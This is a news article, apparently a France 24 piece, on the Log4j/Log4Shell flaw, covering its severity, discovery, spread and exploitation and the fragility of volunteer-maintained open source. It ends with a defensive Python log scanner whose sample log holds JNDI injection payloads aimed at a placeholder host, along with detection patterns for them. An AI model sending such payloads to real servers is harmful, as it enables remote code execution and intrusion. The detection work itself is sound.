Log4j: the computer flaw that shakes the Net to its foundations
Alerts have been mounting in recent days about a new flaw discovered in a tiny, innocent-looking software component that is used by hundreds of millions, if not billions, of websites around the world.
For some it is a tsunami sweeping across the Internet; for others it is the "worst flaw of the decade" or even "in the history of the Net". Computer security experts are vying for superlatives to describe the discovery of a vulnerability that could affect hundreds of millions, if not more than a billion, websites and servers around the world.
Even the Cybersecurity and Infrastructure Security Agency (CISA) has rated it 10, the maximum alert level. "This is one of the most serious flaws, if not the most serious, that I have been confronted with since the start of my career", admitted Jennifer Easterly, director of CISA, during a press briefing on Monday 13 December. Alerts have been issued by almost all national IT security agencies, including ANSSI in France.
The cause of this global panic is called Log4j. It is a small software component whose sole purpose is to "keep an automated log of visits to a site", explains Philippe Rondel, computer security researcher at Check Point, an international cybersecurity software vendor, contacted by France 24. A rather innocuous task and, indeed, "it is typically a small piece of a program that one would never have thought would present a risk", adds this expert.
Then, at the end of November, an employee of the Chinese giant Alibaba discreetly alerted the Apache Foundation (which maintains and distributes Log4j) to the vulnerability he had observed in Log4j. On Friday 10 December, a computer security researcher made public a way to exploit this flaw, dubbed Log4Shell: that was the start of the frenzy.
The digital world then began to see the potential extent of the damage. The component is present in thousands of programs used to run millions of servers, and the developers of all these web tools sometimes do not even know whether their own software depends on it.
A race to understand how exposed the Internet is to this new vulnerability then begins. "It is estimated that there are around 30% of websites that use Log4j", summarizes Philippe Rondel.
For the time being, it has been established that giants such as NASA, Twitter, Oracle and Apple use programs in which the Log4j vulnerability is present. Thus iCloud, Apple's online storage service, could be compromised through this flaw. In theory, Ingenuity, the small helicopter that NASA sent to Mars, is also vulnerable, since some of the software used to communicate with it from Earth is based on Log4j, notes the German daily Süddeutsche Zeitung.
Hackers and cyber spies are also rushing at the new flaw. "We observed 830,000 attempted attacks targeting Check Point customers in 72 hours," said Philippe Rondel. In addition, more than 60 variants of the original method for exploiting Log4Shell are already in circulation, one way for cybercriminals to try to stay ahead of the game.
This surge in attacks is partly due to the fact that cybercriminals "anticipate a short window of opportunity", says Philippe Rondel. A patch for Log4j has been released, and in theory it would suffice to apply it wherever this component is installed. But according to the Check Point expert, it will take time in practice, because finding all the programs and servers that use it is a long-term task.
Hackers have also seized on this flaw because it is very easy to exploit and can do enormous damage. The vulnerability means that an attacker can make Log4j carry out any kind of task, including downloading malware, by disguising the instruction as an ordinary entry for its visit log.
It is all the more enticing because it allows cybercriminals "to execute malicious code on a program without needing authorization", summarizes Philippe Rondel. A cybercriminal normally needs a username and password before infiltrating a server and planting malware on it. This is not the case with Log4Shell.
Attackers then have free rein in exploiting this flaw. They can install a simple destructive virus on the targeted server, opt instead for spyware, or take control of computers on the network.
So far, cybercriminals have mostly used Log4Shell to install malware on targeted computers to turn them into bitcoin-mining machines. "It is one of the simplest uses", acknowledges Philippe Rondel.
But he fears that this first wave of attacks is only a "first earthquake before the tsunami of larger attacks to come." The risk is that certain cybercriminals use this flaw to "get a first foot in the door of the corporate network in order to deploy ransomware that will be activated in the coming weeks", warns the French expert.
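As an added example, not from the article or from Check Point: a defender-side triage script that scans web-server access log lines for the lookup expressions Log4Shell relies on. The article does not state the syntax; it is the `${jndi:...}` lookup that vulnerable Log4j versions evaluate inside logged text. The log lines, addresses and hostnames below are constructed placeholders.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed access-log sample (Common Log Format plus referer and user agent).
# Addresses and hostnames are documentation placeholders, not real indicators.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"
203.0.113.7 - - [10/Dec/2021:14:03:40 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fx%7D HTTP/1.1" 200 88 "-" "curl/7.79"
203.0.113.4 - - [10/Dec/2021:14:04:01 +0000] "GET /price?cur=${env:HOME} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d+ \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Any ${prefix:...} lookup arriving in client-controlled text is worth a look;
# the jndi prefix is the one that leads to remote code execution.
LOOKUP_RE = re.compile(r"\$\{\s*(?P<prefix>[a-z0-9_-]+)\s*:", re.IGNORECASE)


def classify(field: str) -> Optional[str]:
    """'critical' for a JNDI lookup, 'suspicious' for any other lookup, else None."""
    decoded = unquote(field)  # payloads in the URL are often percent-encoded
    prefixes = {m.group("prefix").lower() for m in LOOKUP_RE.finditer(decoded)}
    if "jndi" in prefixes:
        return "critical"
    return "suspicious" if prefixes else None


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """One finding per log line whose request, referer or user agent carries a lookup."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than miss the whole file
        for field in ("req", "ref", "ua"):
            severity = classify(m.group(field))
            if severity:
                findings.append({"ip": m.group("ip"), "field": field, "severity": severity})
                break
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
```

A hit in a web access log only proves that a probe arrived; whether the application behind it actually passed the text to a vulnerable Log4j version has to be confirmed separately.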
The discovery of the flaw also illustrates the fragility of certain components that are important for the proper functioning of the Internet. Log4j is, in effect, a small piece of a program distributed as free software. It is maintained by a few volunteers who look after it in their free time. In other words, multinationals like Apple or Twitter rely, for services and devices that bring in billions, on a component managed by a handful of individuals who are barely paid, thanks to a few generous donors. For Filippo Valsorda, a Google cryptography expert, the Log4j flaw should lead "to making the maintenance of these open source programs a real paid profession, because a whole part of the economy depends on it".